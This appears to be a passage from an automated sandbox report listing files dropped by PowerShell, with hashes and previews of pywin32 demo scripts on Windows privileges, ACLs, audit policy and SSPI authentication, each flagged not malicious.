                                                                                                                                                                                                            Preview:import ntsecuritycon..import win32security..import winnt......class Enum:.. def __init__(self, *const_names):.. """Accepts variable number of constant names that can be found in either.. win32security, ntsecuritycon, or winnt.""".. for const_name in const_names:.. try:.. const_val = getattr(win32security, const_name).. except AttributeError:.. try:.. const_val = getattr(ntsecuritycon, const_name).. except AttributeError:.. try:.. const_val = getattr(winnt, const_name).. except AttributeError:.. raise AttributeError(.. 'Constant "%s" not found in win32security, ntsecuritycon, or winnt.'.. % const_name.. ).. setattr(self, const_name, const_val).... def lookup_name(self, const_val):.. """Looks up the n
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3479
                                                                                                                                                                                                            Entropy (8bit):5.331245927713481
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:SPDxFoF/zpElMLb4R3jZ/DDQKmoyVFFV1g1rsQG5R:ANWJpRE+j/
                                                                                                                                                                                                            MD5:E81F9AB350A8A2A9BEE260B0FCF13FE1
                                                                                                                                                                                                            SHA1:3C07B52A763BBBF989E9EFC9A602FBC14298CB68
                                                                                                                                                                                                            SHA-256:7A07DF6F7C31D4C546111AA6E9ABCC8ED5C0B6B3FA272394BD23BA6D34ADADE9
                                                                                                                                                                                                            SHA-512:2E5830A5E10D8B98AC2EE71FBA5941334C8C6717DCC1A6D6C379BDBEB028D9812117D334ACEA8541321720686479969832DB2B5235CBC09E9323DC1CFC5C556E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import os....import ntsecuritycon..import win32api..import win32con..import win32file..import win32security..from win32security import (.. ACL_REVISION_DS,.. CONTAINER_INHERIT_ACE,.. DACL_SECURITY_INFORMATION,.. GROUP_SECURITY_INFORMATION,.. OBJECT_INHERIT_ACE,.. OWNER_SECURITY_INFORMATION,.. PROTECTED_DACL_SECURITY_INFORMATION,.. SACL_SECURITY_INFORMATION,.. SE_FILE_OBJECT,..)....## SE_SECURITY_NAME needed to access SACL, SE_RESTORE_NAME needed to change owner to someone other than yourself..new_privs = (.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),..)..ph = win32api.GetCurrentProcess()..th = win32security.OpenProcessToken(.. ph, win32security.TOKEN_ALL_ACCESS | win32con.TOKEN_ADJUST_PRIVILEGES..)..modified_privs = win32security.Adju
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2332
                                                                                                                                                                                                            Entropy (8bit):5.294028191848859
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:KXhvixFIFHFoFTFYcFe0aan0KkS5XLXCjWoBxM9KiO:0ixFIFHFoFTFrFFaazpZX58iO
                                                                                                                                                                                                            MD5:6FA1FEEF10F3CF720020AC9BAB641675
                                                                                                                                                                                                            SHA1:74E00A976D5A13978DADE632FF171F384B008837
                                                                                                                                                                                                            SHA-256:5C63320009ADFE6A5135B1EBF1724871104F42AA457727ABC8D3E082358D6DFE
                                                                                                                                                                                                            SHA-512:3A843351524F300A13930345713485FF28205AAFEB9CE71322940A0F1C4E8B96AACFC6999AD5905B318C7B0DF63193BC5ADEA3CED796EFD12061CCD48D86400B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:fname = r"h:\tmp.txt"....import ntsecuritycon..import win32api..import win32con..import win32file..import win32security....new_privs = (.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SHUTDOWN_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TCB_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TAKE_OWNERSHIP_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_CREATE_PERMANENT_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPri
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):993
                                                                                                                                                                                                            Entropy (8bit):5.250231461730239
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1Xj1WSkjcBfpbNBWxDfBBa5fBBN5fJRNr1d0:1XhfpNBGBazBNPRfu
                                                                                                                                                                                                            MD5:AB8F9ABEB9D946CF43412BF928367AC2
                                                                                                                                                                                                            SHA1:B73B378C214D0A363F6A519791F870305D34A5F7
                                                                                                                                                                                                            SHA-256:5D9CE7D887E13623252E967A6BFBB714EBA244D4DD9199458776D09FDF811E61
                                                                                                                                                                                                            SHA-512:52AB3D23306521900EDFA44C537E23AF7A113676EA2EF0A76A3762CD673F94F2A67AD8E6A6469EAD09E94456DFE66B31550D1E9F138A529772D7A0E113C7D3E6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import ntsecuritycon..import win32api..import win32file..import win32security....policy_handle = win32security.GetPolicyHandle("rupole", win32security.POLICY_ALL_ACCESS)....event_audit_info = win32security.LsaQueryInformationPolicy(.. policy_handle, win32security.PolicyAuditEventsInformation..)..print(event_audit_info)....new_audit_info = list(event_audit_info[1])..new_audit_info[win32security.AuditCategoryPolicyChange] = (.. win32security.POLICY_AUDIT_EVENT_SUCCESS | win32security.POLICY_AUDIT_EVENT_FAILURE..)..new_audit_info[win32security.AuditCategoryAccountLogon] = (.. win32security.POLICY_AUDIT_EVENT_SUCCESS | win32security.POLICY_AUDIT_EVENT_FAILURE..)..new_audit_info[win32security.AuditCategoryLogon] = (.. win32security.POLICY_AUDIT_EVENT_SUCCESS | win32security.POLICY_AUDIT_EVENT_FAILURE..)....win32security.LsaSetInformationPolicy(.. policy_handle, win32security.PolicyAuditEventsInformation, (1, new_audit_info)..)....win32security.LsaClose(policy_handle)..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5048
                                                                                                                                                                                                            Entropy (8bit):5.311717692835169
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:rbQFcFBF7FWF2FLFxFCFvtFoFS/FVr6+xNfa/2RTKsRnhl8lUwP07:rk6DpsAxjIHa4BxU8K0Cv07
                                                                                                                                                                                                            MD5:7526F87BD599D1AE0C1E34A0324911CA
                                                                                                                                                                                                            SHA1:41EF0B4F4B35FF70EF0F013B905BB78817073CB1
                                                                                                                                                                                                            SHA-256:11D0739E3E0593A50D67253E63E760AD8D06724068F9698B8B730DDF028C6316
                                                                                                                                                                                                            SHA-512:93B3AF17CDBEC15EB28E03AE21B359EBF26B46B82340B0D5FE0E861816C5FC3D8792B31436CEA87BD36DFF29CADBFCEF1E2CF716A1EEE5EB6F8569A1025E3AED
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import win32api..import win32con..import win32process..import win32security....## You need SE_RESTORE_NAME to be able to set the owner of a security descriptor to anybody..## other than yourself or your primary group. Most admin logins don't have it by default, so..## enabling it may fail..new_privs = (.. (.. win32security.LookupPrivilegeValue("", win32security.SE_SECURITY_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", win32security.SE_TCB_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", win32security.SE_SHUTDOWN_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", win32security.SE_RESTORE_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", win32security.SE_TAKE_OWNERSHIP_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4519
                                                                                                                                                                                                            Entropy (8bit):5.288512280088918
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:jnYbQFcFBF7FWF2FLFxFCFvtFoFS/FVpxdZnhl8daZfGft+:ck6DpsAxjIHa4Jx5Fa+
                                                                                                                                                                                                            MD5:3E7626B37208A4DB452AF9C836334B59
                                                                                                                                                                                                            SHA1:8FDC2A75759E27D4F6DB3031BD29E3D39DA3AA39
                                                                                                                                                                                                            SHA-256:ABF04EA8D12F8E105A93FDFE251EB357B724D3764334440A699CA6AC47992CF1
                                                                                                                                                                                                            SHA-512:D739E3DC3ACBC71291BC27B7108EF852D923942BFAC84F455DFE28D31AD12B7CA778857CB59A91DE1367BE527C6D13ACAB4681A9AD81600A8FA6C6FDC4EB1957
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import win32api..import win32con..import win32process..import win32security....fname, tmp = win32api.GetTempFileName(win32api.GetTempPath(), "tmp")..print(fname)..## You need SE_RESTORE_NAME to be able to set the owner of a security descriptor to anybody..## other than yourself or your primary group. Most admin logins don't have it by default, so..## enabling it may fail..new_privs = (.. (.. win32security.LookupPrivilegeValue("", win32security.SE_SECURITY_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", win32security.SE_TCB_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", win32security.SE_SHUTDOWN_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", win32security.SE_RESTORE_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", win32security.SE_
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4669
                                                                                                                                                                                                            Entropy (8bit):5.298310451606236
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:rbQFcFBF7FWF2FLFxFCFvtFoFS/FVr6+xNsTKsUnhl8AC2iPZTe:rk6DpsAxjIHa4Bx6Kd4nte
                                                                                                                                                                                                            MD5:A53CEC23C218AA9A8FA4A4A01592851C
                                                                                                                                                                                                            SHA1:E0F4D688A2CEC101BC8583054922BD5BE876873F
                                                                                                                                                                                                            SHA-256:C2DD04CFA466732022FD003A6F8575AAC59779AA77F0A23BAF96626FAFC1D4B2
                                                                                                                                                                                                            SHA-512:9A96A9DC6C2D3CD9B4D9718F2C4B35EF227A10BBDFC574A5BDA688EFE34813CE3487DA278BA60F4BE3BDF05968C02F0FFCD126F017A2CCE180B3F33FB93615E0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import win32api..import win32con..import win32process..import win32security....## You need SE_RESTORE_NAME to be able to set the owner of a security descriptor to anybody..## other than yourself or your primary group. Most admin logins don't have it by default, so..## enabling it may fail..new_privs = (.. (.. win32security.LookupPrivilegeValue("", win32security.SE_SECURITY_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", win32security.SE_TCB_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", win32security.SE_SHUTDOWN_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", win32security.SE_RESTORE_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", win32security.SE_TAKE_OWNERSHIP_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3485
                                                                                                                                                                                                            Entropy (8bit):5.275054647354064
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:6iQFcFBF7FWF2FLFxFCFvtFoFS/FVnxdIpt6h2C6Jy:O6DpsAxjIHa4Hxuto2NJy
                                                                                                                                                                                                            MD5:C9FEF6A0CA6F3EEFA8845ADC67680A7E
                                                                                                                                                                                                            SHA1:F52E5B1E83512DE67A3D8D457B62937667D4EB70
                                                                                                                                                                                                            SHA-256:B0A850CA2310BEAA9C30397326A8C325C377BC306B7BCFC62B9EC8C00B05F17B
                                                                                                                                                                                                            SHA-512:3BBE1517759A2584BD502D99F6438874A6AB9917A0C7C0EF5EF7864D1DF4680BC213E8C9D3F623994F40AAD44F30400FE6BE5063E08E5891E39FD969E83A3F5C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import win32api..import win32con..import win32process..import win32security....new_privs = (.. (.. win32security.LookupPrivilegeValue("", win32security.SE_SECURITY_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", win32security.SE_TCB_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", win32security.SE_SHUTDOWN_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", win32security.SE_RESTORE_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", win32security.SE_TAKE_OWNERSHIP_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", win32security.SE_CREATE_PERMANENT_NAME),.. win32con.SE_PRIVILEGE_ENABLED,.. ),.. (.. win32security.LookupPrivilegeValue("", win32security.SE_ENABLE_DELE
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3983
                                                                                                                                                                                                            Entropy (8bit):5.817320574326987
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CMlzJ/5AWoTT99nlI9GVbIQMtBDr7oNqyZEEh:C8VgTT99kGVbIrH3yZEEh
                                                                                                                                                                                                            MD5:6363DE8BB800BDE7156BABEFB6EEB172
                                                                                                                                                                                                            SHA1:F412BE01583C62EA1C1FE1086B0D6BED554DC5B6
                                                                                                                                                                                                            SHA-256:C0AB8A00DFAD169E5C6ABA788ABBE016946CF26BD74C9290ED672A4CAA2BE227
                                                                                                                                                                                                            SHA-512:D2194EDAE38CF77AC20927BBF0CCE1A99AA4C8EAD4555A631B7334423B025245712951FBB7CCF29745F3C0225B47C8A4A03061B0B0C644684A03C8A7E1CAE7FF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sH...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.Z.d.d...Z.e.d.k.r.e.j.e.d...Z.e.j.d.d.d.d.d.....e.j.d.d.d.d.d.....e.j.d.d.d.d.d.....e.j.d.d.d.d.d.....e.j.d.d.d.d.d.....e.....\.Z.Z.e.spe.d.....d.g.Z.e.D.]/Z.e.j...e...\.Z.Z.Z.Z.Z.Z.e.d.k.s.e.s.e.s.e.r.e...d.....e.d.e...d.e...d.......e.e.e...Z qrd.S.d.S.).a.....Fetches a URL from a web-server supporting NTLM authentication.eg, IIS...If no arguments are specified, a default of http://localhost/localstart.asp.is used. This script does follow simple 302 redirections, so pointing at the.root of an IIS server is should work.......N)...decodestring..encodestring)...ClientAuthc....................C...s....t.j...|...}.|...d.|.....|.......|.....}.t.d.|.j.|.j.....|.....}.|.j.d.k.rFd.|.j.d.....}.|.......|...d.|.....|.......|.....}.t.d.|.j.|.j.....t.j.rct.d.....t.|.j.......D.].\.}.}.t.d.|...d.|.........qTt.j.rjt.|.....|.j.d.k...rVd.}.t.j.s{t.j.s{t.j.r.t.j.t.j.t.j.f.}.t.d.|.d...}
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1589
                                                                                                                                                                                                            Entropy (8bit):5.779272090926632
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CjBDCMjd6lhg02qtOAvNMD0hA/D2Egct2/wZE7S:CVJ0ZtOsiD0hA/SEXkv7S
                                                                                                                                                                                                            MD5:FC8E8EC5A37366FDD245CE038A70BF73
                                                                                                                                                                                                            SHA1:9F2D40606B5D69FDD00FA9030A584D3A9305B2BF
                                                                                                                                                                                                            SHA-256:7D851EE9516D5DEB241B91F5ADBF5E2966E1667F388F89321C97FAEB8A82D924
                                                                                                                                                                                                            SHA-512:5D7FEB6F08504F2A539D4570A7C24DB1A933B5BBF1D54921BA42852ADA51E91686BEF397C6A7475A81BBE0F56DB7589C34B406946B2BFA052BF36DA2E56A3E04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gm........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z...d.Z.e...e...Z.e...e...Z.d.Z...e...e...\.Z.Z.e...e...\.Z.Z.e.d.k.r7n.q$e.j.......e.d.e...e.j.......e.j.......e.d.e.........e.j...e.j...Z.d.Z.e.d...Z.e.....Z.e...e...e.e...e.j.......e...e...e.e.j.......e.e.d..._ e.j..!d.e.d.....e.j.."e.d.....e.d...Z#e.....Z$e$..e...e.e...e.j.......e$..e...e#e.j.......e.e$d..._ e.j..%d.e$d.....e.d.e&e$d...j ......e.j..'e$d.....e.d.e$d...j ....d.S.)......Nc....................C...s<...t.t.j.......D.].\.}.}.|.d.d.....d.v.r.|.|.k.r.|.....S.q.d.S.).Nr.........).Z.SEC_I_Z.SEC_E_)...list..sspicon..__dict__..items)...err..k..v..r.....|C:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/security/sspi/simple_auth.py..lookup_ret_code....s..............r....Z.NTLM.....z.Impersonated user: z.Reverted to self: z some data to be encrypted ......Z.MaxSignatureZ.SecurityTrailerz.Encrypted data:z.Unencrypted data:)(Z.sspir....Z.win32apiZ.win3
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5625
                                                                                                                                                                                                            Entropy (8bit):5.4792480152251075
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CQ3Zh4XvC33ChyuokVMjrA/vvw4MaYTkjuGItDinI9/Z6Di9+Az:Ca8vCCgPYMQ/v44MYjMDBa+
                                                                                                                                                                                                            MD5:95BDF2B9F517AA11D4A41E6E21CBB92D
                                                                                                                                                                                                            SHA1:860A40247FF65D7B588F797225A8FFF8178CBBE2
                                                                                                                                                                                                            SHA-256:887974BFE9491A050C31F414EE7775E0DB24D921FB305E3A4360F642CEBD67D1
                                                                                                                                                                                                            SHA-512:B41DD5594ACE51A991F18BE60C86449344D97DF4F30C04844009C23E99793A1FEBA7967CD46A64FA78F9F587758443D3AAFCADD0AC6A57C4EA0982E45F95B158
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e.j...Z.d.d...Z.d.d...Z.e.d.k.r.e.j.d.e.d...Z.e.j.d.d.d.d.d.d.....e.j.d.d.d.d.d.....e.j.d.d.d.d.d.d.....e.j.d.d.d.d d.....e.....\.Z.Z.z.e.e.j...e._.W.n...e.e.f.y.......e...d!....Y.n.w.zEz e.s.d.g.Z.e.d...d"k.r.e.....n.e.d...d#k.r.e.....n.e...d$....W.n...e.y.......Y.n...e.y.......Y.n.......e.......Y.W.e.j r.e!d%....d.S.d.S.e.j r.e!d%....w.w.d.S.)&a#...A sample socket server and client using SSPI authentication and encryption...You must run with either 'client' or 'server' as arguments. A server must be.running before a client can connect...To use with Kerberos you should include in the client options.--target-spn=username, where 'username' is the user under which the server is.being run...Running either the client or server as a different user can be informative..A command-line such as the following may be useful:.`runas /user:{user} {f
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1084
                                                                                                                                                                                                            Entropy (8bit):5.502686395035909
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:CrNYhf3BaJsSqgxJR3HnssMiHUx28WY0LNlEmtkQRy09sWtFB:Crcvg/HnssMiUx2HY0JlrbQ09fFB
                                                                                                                                                                                                            MD5:0CDB7F4068BFBD69786951C48E6C1C48
                                                                                                                                                                                                            SHA1:71B7B671F526E23C1F2ECF771BAFB92C67BF8A84
                                                                                                                                                                                                            SHA-256:66D543059EFACD09516C25CAA952D5A9D16E62B8F29ABB71DD5C04BFC42964F4
                                                                                                                                                                                                            SHA-512:CCC1E08FB0EDBEB4873D063A0DF71135BC41B9361CF4977B4820FA952BDF01DF0684D66D54AB6F61F56D0699614B20F21EE6FFB4833224614452C04AC982BBB8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.d...Z.e.d.k.r{e.e.j...d.v.r-e.d.e...d.......e...d.....d.Z.e.e.j...d.k.r;e.j.d...Z.d.Z.e.e.j...d.k.rIe.j.d...Z.z.e.e.j.d...e.e.....e.d.....W.d.S...e.j.yz..Z...z.e.\.Z.Z.Z.e.d.e.e.f.......W.Y.d.Z.[.d.S.d.Z.[.w.w.d.S.)......N)...ClientAuth..ServerAuth..c....................C...sZ...|.|.|.f.}.t.d.|.d...}.t.d...}.d...}.}.|.d.k.r+|...|...\.}.}.|...|...\.}.}.|.d.k.s.d.S.d.S.).NZ.NTLM)...auth_infor....).r....r....Z.authorize)...username..password..domainr......ca..sa..data..err..r......C:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/security/sspi/validate_password.py..validate....s....................r......__main__)................z.Usage: z. username [password [domain]].....r....r....r....z.Validated OKz.Validation failed: %s (%d)).r....)...sysZ.win32securityZ.sspir....r....r......__name__..len..argv..print..__file__..exitr....r......error..details..hr..func..msgr
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5573
                                                                                                                                                                                                            Entropy (8bit):4.425963563682009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:g6oGNiMJoYJZfgcceVysJ0MoupqD3HwJ7JSGzsPrCVZpE:ioJoYJHysJ/oYqLwJlSGzsPrCVZpE
                                                                                                                                                                                                            MD5:51EF1A6A00516C1E9944EDE5AC9D22DD
                                                                                                                                                                                                            SHA1:9B4E7D9BAAF1689F38DEFBDE3E02D613E5C60F96
                                                                                                                                                                                                            SHA-256:B2F9F1219810A0B5B695858A42D0D4E45533A546565303259D94570DAA97E8F5
                                                                                                                                                                                                            SHA-512:CAEF1B4C6331523F79FEBA179BBC76C0948445FE2945F0DF136D918CE99003015FFD5F346BF426627C10BDEB56DDCABB9EB0697EDE8633DDFAD616A922A23BA0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""..Fetches a URL from a web-server supporting NTLM authentication..eg, IIS.....If no arguments are specified, a default of http://localhost/localstart.asp..is used. This script does follow simple 302 redirections, so pointing at the..root of an IIS server is should work..."""....import http.client # sorry, this demo needs 2.3+..import optparse..import urllib.error..import urllib.parse..import urllib.request..from base64 import decodestring, encodestring....from sspi import ClientAuth....options = None # set to optparse options object......def open_url(host, url):.. h = http.client.HTTPConnection(host).. # h.set_debuglevel(9).. h.putrequest("GET", url).. h.endheaders().. resp = h.getresponse().. print("Initial response is", resp.status, resp.reason).. body = resp.read().. if resp.status == 302: # object moved.. url = "/" + resp.msg["location"].. resp.close().. h.putrequest("GET", url).. h.endheaders().. resp = h.getresp
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2925
                                                                                                                                                                                                            Entropy (8bit):5.304853640640119
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:O34p8xtUdH/ybSouptMhSJpje1qkMqwazqgq0qQCYTnvcsoI+JgYnSJ2dvXYr9xi:4x+HNRtMIJY1qkMq5zqgq0qHonvHEYre
                                                                                                                                                                                                            MD5:F29F311DEEBDE196C370366BFFFE52C9
                                                                                                                                                                                                            SHA1:738075B2C09AB15255A63D10984BD7073E64D4B4
                                                                                                                                                                                                            SHA-256:800029ED6A4D0AE0A2552121FE4DFC414A4577A8E7CA19EEF67D2A9D6C498DBC
                                                                                                                                                                                                            SHA-512:ADCAFD66BDC5C4268C91215B08A5318C60B5E1104F667A3E0B7C55C7B86037875B027BD835C4E9615289D533ED425C2238CFD0EBF72D2C932FD5B0247541DDED
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# A demo of basic SSPI authentication...# There is a 'client' context and a 'server' context - typically these will..# be on different machines (here they are in the same process, but the same..# concepts apply)..import sspi..import sspicon..import win32api..import win32security......def lookup_ret_code(err):.. for k, v in list(sspicon.__dict__.items()):.. if k[0:6] in ("SEC_I_", "SEC_E_") and v == err:.. return k......"""..pkg_name='Kerberos'..sspiclient=SSPIClient(pkg_name, win32api.GetUserName(), ## target spn is ourself.. None, None, ## use none for client name and authentication information for current context.. ## 'username', ('username','domain.com','passwd'),.. sspicon.ISC_REQ_INTEGRITY|sspicon.ISC_REQ_SEQUENCE_DETECT|sspicon.ISC_REQ_REPLAY_DETECT| \.. sspicon.ISC_REQ_DELEGATE|sspicon.ISC_REQ_CONFIDENTIALITY|sspicon.ISC_REQ_USE_SESSION_KEY)..sspiserver=SSPIServer(pkg_name, None,.. sspicon.ASC_REQ_INTEGRITY|sspicon.ASC_REQ_SEQUENCE_D
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6559
                                                                                                                                                                                                            Entropy (8bit):4.491253671098533
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:MZaoEZCe9TEQ7AzD7VvMQEfDGRaRxJrWejU:64CmTPArV0QE77up
                                                                                                                                                                                                            MD5:8C4D3EA09F82F11CF614548DE2B28E6A
                                                                                                                                                                                                            SHA1:530BD4A7AA9082F66ECE291F9AB98BA547848C95
                                                                                                                                                                                                            SHA-256:9445E894666DC413F6DED4F9AD96A2D5D91168D245D059FF54622F87D6EB6369
                                                                                                                                                                                                            SHA-512:E3DB3998182D57F165FEBDFEAD6BFD34DF09D4E66900F631EBE658EF59422E3C6E1962BC5A596A363ADBC70D46C90862D67D8D02DA53ECEC015DE44ED95CFDB4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
